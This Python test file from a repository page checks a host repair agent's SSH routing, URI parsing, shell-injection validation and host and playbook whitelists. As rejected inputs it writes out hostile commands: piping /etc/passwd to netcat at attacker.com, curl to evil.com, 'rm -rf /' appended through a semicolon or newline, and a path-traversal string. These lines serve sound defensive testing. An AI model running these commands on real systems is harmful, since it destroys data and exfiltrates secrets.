Files
awoooi/apps/api/tests/test_host_repair_agent.py
OG T f8d4772abf fix(api): Sprint 3 P0-1/P0-2/P0-3/P0-4 Critical Security Fixes
P0-1: Complete shell metacharacter regex detection
  - Enhanced _SHELL_METACHAR_RE to detect: >, <, \n, ${}, $()
  - Prevents all shell injection vectors (redirects, variable expansion, newlines)
  - Added 5 new validation tests

P0-2: Add shlex.quote() protection for ansible playbook path
  - Wraps playbook_path in shlex.quote() before SSH command construction
  - Prevents shell injection if path contains special characters
  - Applied in _execute_ansible() method

P0-3: Add SSH target host whitelist validation
  - Introduces validate_ssh_target_host() function
  - Only allows SSH to: 192.168.0.110, 192.168.0.188
  - Prevents unauthorized SSH target exploitation
  - Added 5 new whitelist validation tests

P0-4: Convert HostRepairAgent to singleton pattern
  - Implements __new__() singleton with shared _in_process_locks dict
  - Ensures in-process locks persist across multiple auto_repair_service calls
  - Previously created new instance per call, making locks ineffective
  - Added singleton persistence test

Test Results: 45/45 passing (34 existing + 11 new P0 tests)
All security validations verified via comprehensive unit test coverage.

Co-Authored-By: Claude Haiku 4.5 <noreply@anthropic.com>
2026-04-07 11:09:45 +08:00

440 lines
19 KiB
Python
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
"""
tests/test_host_repair_agent.py
Host Repair Agent 單元測試
不需要實際 SSH 連線 — 測試路由邏輯和命令組裝
2026-04-06 Claude Code: Sprint 3 T1 — URI 解析與安全防護測試
"""
import asyncio
import pytest
from unittest.mock import AsyncMock, patch
# =============================================================================
# 測試 HostRepairConfig 路由
# =============================================================================
class TestHostRepairConfig:
def test_layer_docker_110_routes_to_110(self):
from src.services.host_repair_agent import get_ssh_config_for_layer
config = get_ssh_config_for_layer("docker-110")
assert config["user"] == "wooo"
assert config["host"] == "192.168.0.110"
def test_layer_docker_188_routes_to_188(self):
from src.services.host_repair_agent import get_ssh_config_for_layer
config = get_ssh_config_for_layer("docker-188")
assert config["user"] == "ollama"
assert config["host"] == "192.168.0.188"
def test_layer_systemd_188_routes_to_188(self):
from src.services.host_repair_agent import get_ssh_config_for_layer
config = get_ssh_config_for_layer("systemd-188")
assert config["user"] == "ollama"
assert config["host"] == "192.168.0.188"
def test_unknown_layer_raises(self):
from src.services.host_repair_agent import get_ssh_config_for_layer
with pytest.raises(ValueError, match="Unknown layer"):
get_ssh_config_for_layer("unknown-layer")
def test_k8s_layer_raises(self):
"""k8s layer 不走 SSH應 raise"""
from src.services.host_repair_agent import get_ssh_config_for_layer
with pytest.raises(ValueError, match="kubectl"):
get_ssh_config_for_layer("k8s")
# =============================================================================
# 測試 SSH 命令組裝
# =============================================================================
class TestSSHCommandBuilding:
def test_repair_command_format(self):
from src.services.host_repair_agent import build_repair_command
cmd = build_repair_command("sentry")
assert cmd == "repair:sentry"
def test_repair_command_component_sanitized(self):
"""防止 command injection"""
from src.services.host_repair_agent import build_repair_command
with pytest.raises(ValueError, match="Invalid component"):
build_repair_command("sentry; rm -rf /")
def test_repair_command_valid_components(self):
from src.services.host_repair_agent import build_repair_command
valid = ["sentry", "harbor", "gitea", "openclaw", "gitea-runner", "alertmanager", "redis", "nginx"]
for component in valid:
cmd = build_repair_command(component)
assert cmd == f"repair:{component}"
# =============================================================================
# 測試 HostRepairAgent.repair() 路由
# =============================================================================
class TestHostRepairAgent:
@pytest.mark.asyncio
async def test_repair_success_returns_ok(self):
from src.services.host_repair_agent import HostRepairAgent
agent = HostRepairAgent()
with patch.object(agent, "_ssh_execute", new_callable=AsyncMock) as mock_ssh:
mock_ssh.return_value = "REPAIR_OK:sentry"
result = await agent.repair(layer="docker-110", component="sentry")
assert result.success is True
assert result.component == "sentry"
assert result.layer == "docker-110"
mock_ssh.assert_called_once_with(
host="192.168.0.110",
user="wooo",
key_path="/etc/repair-ssh/id_ed25519",
command="repair:sentry"
)
@pytest.mark.asyncio
async def test_repair_fail_returns_failure(self):
from src.services.host_repair_agent import HostRepairAgent
agent = HostRepairAgent()
with patch.object(agent, "_ssh_execute", new_callable=AsyncMock) as mock_ssh:
mock_ssh.return_value = "REPAIR_FAIL:harbor:exit_1"
result = await agent.repair(layer="docker-110", component="harbor")
assert result.success is False
assert "REPAIR_FAIL" in result.error
@pytest.mark.asyncio
async def test_repair_ssh_timeout_returns_failure(self):
from src.services.host_repair_agent import HostRepairAgent
agent = HostRepairAgent()
with patch.object(agent, "_ssh_execute", new_callable=AsyncMock) as mock_ssh:
mock_ssh.side_effect = asyncio.TimeoutError()
result = await agent.repair(layer="docker-110", component="sentry")
assert result.success is False
assert "timeout" in result.error.lower()
@pytest.mark.asyncio
async def test_repair_denied_returns_failure(self):
from src.services.host_repair_agent import HostRepairAgent
agent = HostRepairAgent()
with patch.object(agent, "_ssh_execute", new_callable=AsyncMock) as mock_ssh:
mock_ssh.return_value = "REPAIR_DENIED:unknown_component:badcomponent"
result = await agent.repair(layer="docker-110", component="badcomponent")
assert result.success is False
# =============================================================================
# 測試 URI Scheme 解析
# 2026-04-06 Claude Code: Sprint 3 T1
# =============================================================================
class TestParseUriCommand:
def test_openclaw_scheme(self):
from src.services.host_repair_agent import parse_uri_command
result = parse_uri_command("openclaw://docker-110/sentry")
assert result.scheme == "openclaw"
assert result.host_or_layer == "docker-110"
assert result.payload == "sentry"
def test_ansible_scheme(self):
from src.services.host_repair_agent import parse_uri_command
result = parse_uri_command("ansible://192.168.0.188/vacuum_postgres.yml")
assert result.scheme == "ansible"
assert result.host_or_layer == "192.168.0.188"
assert result.payload == "vacuum_postgres.yml"
def test_ssh_scheme(self):
from src.services.host_repair_agent import parse_uri_command
result = parse_uri_command("ssh://wooo@192.168.0.110/docker ps")
assert result.scheme == "ssh"
assert result.host_or_layer == "wooo@192.168.0.110"
assert result.payload == "docker ps"
def test_invalid_scheme_raises(self):
from src.services.host_repair_agent import parse_uri_command
with pytest.raises(ValueError, match="Unsupported scheme"):
parse_uri_command("http://example.com/cmd")
def test_missing_payload_raises(self):
from src.services.host_repair_agent import parse_uri_command
with pytest.raises(ValueError, match="payload"):
parse_uri_command("ansible://192.168.0.188/")
def test_legacy_format_raises(self):
from src.services.host_repair_agent import parse_uri_command
with pytest.raises(ValueError, match="Unsupported scheme"):
parse_uri_command("docker-110/sentry")
class TestValidateShellSafety:
def test_safe_command_passes(self):
from src.services.host_repair_agent import validate_shell_safety
validate_shell_safety("docker ps") # must not raise
def test_semicolon_blocked(self):
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="Shell metacharacter"):
validate_shell_safety("docker ps; rm -rf /")
def test_pipe_blocked(self):
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="Shell metacharacter"):
validate_shell_safety("cat /etc/passwd | nc attacker.com 9999")
def test_double_ampersand_blocked(self):
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="Shell metacharacter"):
validate_shell_safety("ls && curl http://evil.com")
def test_command_substitution_blocked(self):
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="Shell metacharacter"):
validate_shell_safety("echo $(id)")
def test_backtick_blocked(self):
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="Shell metacharacter"):
validate_shell_safety("echo `id`")
def test_too_long_blocked(self):
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="too long"):
validate_shell_safety("a" * 513)
import os
from unittest.mock import patch, AsyncMock
class TestAnsibleWhitelist:
def test_allowed_playbook_passes(self):
from src.services.host_repair_agent import validate_ansible_playbook
with patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml,clear_redis_cache.yml"}):
validate_ansible_playbook("vacuum_postgres.yml") # must not raise
def test_disallowed_playbook_raises(self):
from src.services.host_repair_agent import validate_ansible_playbook
with patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}):
with pytest.raises(ValueError, match="not in allowed whitelist"):
validate_ansible_playbook("evil_script.sh")
def test_path_traversal_blocked(self):
from src.services.host_repair_agent import validate_ansible_playbook
with patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}):
with pytest.raises(ValueError, match="not in allowed whitelist"):
validate_ansible_playbook("../../../etc/passwd")
class TestRepairByUri:
@pytest.mark.asyncio
async def test_openclaw_scheme_calls_repair(self):
from src.services.host_repair_agent import HostRepairAgent, HostRepairResult
agent = HostRepairAgent()
with patch.object(agent, "_execute_openclaw", new_callable=AsyncMock) as mock_oc:
mock_oc.return_value = HostRepairResult(success=True, layer="docker-110", component="sentry", output="REPAIR_OK:sentry")
result = await agent.repair_by_uri("openclaw://docker-110/sentry")
assert result.success is True
mock_oc.assert_awaited_once_with("docker-110", "sentry")
@pytest.mark.asyncio
async def test_ansible_scheme_calls_ansible(self):
from src.services.host_repair_agent import HostRepairAgent, HostRepairResult
agent = HostRepairAgent()
with patch.object(agent, "_execute_ansible", new_callable=AsyncMock) as mock_ans, \
patch.dict(os.environ, {"ANSIBLE_PLAYBOOK_WHITELIST": "vacuum_postgres.yml"}):
mock_ans.return_value = HostRepairResult(success=True, layer="ansible", component="vacuum_postgres.yml", output="REPAIR_OK:ansible")
result = await agent.repair_by_uri("ansible://192.168.0.188/vacuum_postgres.yml")
assert result.success is True
mock_ans.assert_awaited_once_with("192.168.0.188", "vacuum_postgres.yml")
@pytest.mark.asyncio
async def test_ssh_scheme_blocked_without_approval_flag(self):
from src.services.host_repair_agent import HostRepairAgent
agent = HostRepairAgent()
result = await agent.repair_by_uri("ssh://wooo@192.168.0.110/docker ps")
assert result.success is False
assert "requires_approval" in result.error
@pytest.mark.asyncio
async def test_invalid_uri_returns_failure(self):
from src.services.host_repair_agent import HostRepairAgent
agent = HostRepairAgent()
result = await agent.repair_by_uri("bad-format")
assert result.success is False
assert "Unsupported scheme" in result.error
class TestAuditLog:
@pytest.mark.asyncio
async def test_successful_repair_writes_audit_log(self):
"""成功修復應寫入 AuditLog 到 DB"""
from src.services.host_repair_agent import HostRepairAgent, HostRepairResult
from unittest.mock import patch, AsyncMock
agent = HostRepairAgent()
with patch.object(agent, "_execute_openclaw", new_callable=AsyncMock) as mock_oc, \
patch.object(agent, "_write_audit_log", new_callable=AsyncMock) as mock_audit:
mock_oc.return_value = HostRepairResult(
success=True, layer="docker-110", component="sentry", output="REPAIR_OK:sentry"
)
result = await agent.repair_by_uri("openclaw://docker-110/sentry")
assert result.success is True
assert mock_audit.called, "AuditLog should be called"
call_kwargs = mock_audit.call_args
assert call_kwargs is not None
class TestRepairLock:
@pytest.mark.asyncio
async def test_duplicate_repair_is_blocked(self):
"""同一個 component 的修復,第二次呼叫應被 lock 阻擋"""
import asyncio
from src.services.host_repair_agent import HostRepairAgent, HostRepairResult
from unittest.mock import AsyncMock, patch
agent = HostRepairAgent()
call_count = 0
async def fake_execute_openclaw(layer, component):
nonlocal call_count
call_count += 1
await asyncio.sleep(0.1) # simulate work
return HostRepairResult(success=True, layer=layer, component=component, output="REPAIR_OK:test")
with patch.object(agent, "_execute_openclaw", side_effect=fake_execute_openclaw):
results = await asyncio.gather(
agent.repair_by_uri("openclaw://docker-110/sentry"),
agent.repair_by_uri("openclaw://docker-110/sentry"),
return_exceptions=True,
)
successes = [r for r in results if isinstance(r, HostRepairResult) and r.success]
blocked = [r for r in results if isinstance(r, HostRepairResult) and not r.success and "already running" in r.error]
assert len(successes) == 1
assert len(blocked) == 1
@pytest.mark.asyncio
async def test_singleton_lock_persistence(self):
"""P0-4: 測試 singleton 模式確保 in-process lock 跨 instance 共享"""
import asyncio
from src.services.host_repair_agent import HostRepairAgent, HostRepairResult
from unittest.mock import AsyncMock, patch
# Create two instances (should be the same object due to singleton)
agent1 = HostRepairAgent()
agent2 = HostRepairAgent()
assert agent1 is agent2, "HostRepairAgent should be singleton"
assert agent1._in_process_locks is agent2._in_process_locks, "Locks dict should be shared"
call_count = 0
async def fake_execute(layer, component):
nonlocal call_count
call_count += 1
await asyncio.sleep(0.05)
return HostRepairResult(success=True, layer=layer, component=component, output="OK")
# Use agent1 and agent2 in concurrent calls
with patch.object(agent1, "_execute_openclaw", side_effect=fake_execute):
results = await asyncio.gather(
agent1.repair_by_uri("openclaw://docker-110/test"),
agent2.repair_by_uri("openclaw://docker-110/test"),
return_exceptions=True,
)
successes = [r for r in results if isinstance(r, HostRepairResult) and r.success]
blocked = [r for r in results if isinstance(r, HostRepairResult) and not r.success and "already running" in r.error]
assert len(successes) == 1, "First call should succeed"
assert len(blocked) == 1, "Second call should be blocked by shared lock"
# =============================================================================
# P0-1 Tests: Enhanced shell metacharacter detection
# =============================================================================
class TestEnhancedShellMetacharDetection:
"""2026-04-06 Claude Code: Sprint 3 P0-1 Tests"""
def test_redirect_out_blocked(self):
"""P0-1: > 重導向應被阻擋"""
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="Shell metacharacter"):
validate_shell_safety("ls > /tmp/out")
def test_redirect_in_blocked(self):
"""P0-1: < 重導向應被阻擋"""
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="Shell metacharacter"):
validate_shell_safety("cat < /etc/passwd")
def test_newline_blocked(self):
"""P0-1: Newline 換行應被阻擋(允許多行命令)"""
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="Shell metacharacter"):
validate_shell_safety("ls\nrm -rf /")
def test_dollar_brace_substitution_blocked(self):
"""P0-1: ${ 變數擴展應被阻擋"""
from src.services.host_repair_agent import validate_shell_safety
with pytest.raises(ValueError, match="Shell metacharacter"):
validate_shell_safety("echo ${PATH}")
def test_safe_simple_command_passes(self):
"""P0-1: 簡單命令應通過"""
from src.services.host_repair_agent import validate_shell_safety
validate_shell_safety("docker ps") # must not raise
# =============================================================================
# P0-3 Tests: SSH target host whitelist
# =============================================================================
class TestSSHTargetWhitelist:
"""2026-04-06 Claude Code: Sprint 3 P0-3 Tests"""
def test_allowed_host_110_passes(self):
"""P0-3: 192.168.0.110 在白名單應通過"""
from src.services.host_repair_agent import validate_ssh_target_host
validate_ssh_target_host("192.168.0.110") # must not raise
def test_allowed_host_188_passes(self):
"""P0-3: 192.168.0.188 在白名單應通過"""
from src.services.host_repair_agent import validate_ssh_target_host
validate_ssh_target_host("192.168.0.188") # must not raise
def test_unauthorized_host_blocked(self):
"""P0-3: 非白名單的主機應被阻擋"""
from src.services.host_repair_agent import validate_ssh_target_host
with pytest.raises(ValueError, match="not in allowed whitelist"):
validate_ssh_target_host("192.168.0.999")
def test_localhost_blocked(self):
"""P0-3: localhost 應被阻擋"""
from src.services.host_repair_agent import validate_ssh_target_host
with pytest.raises(ValueError, match="not in allowed whitelist"):
validate_ssh_target_host("127.0.0.1")
@pytest.mark.asyncio
async def test_ssh_scheme_with_unauthorized_host_fails(self):
"""P0-3: ssh:// URI 指向未授權主機應失敗"""
from src.services.host_repair_agent import HostRepairAgent
agent = HostRepairAgent()
result = await agent.repair_by_uri("ssh://wooo@192.168.0.999/ls", approved=True)
assert result.success is False
assert "not in allowed whitelist" in result.error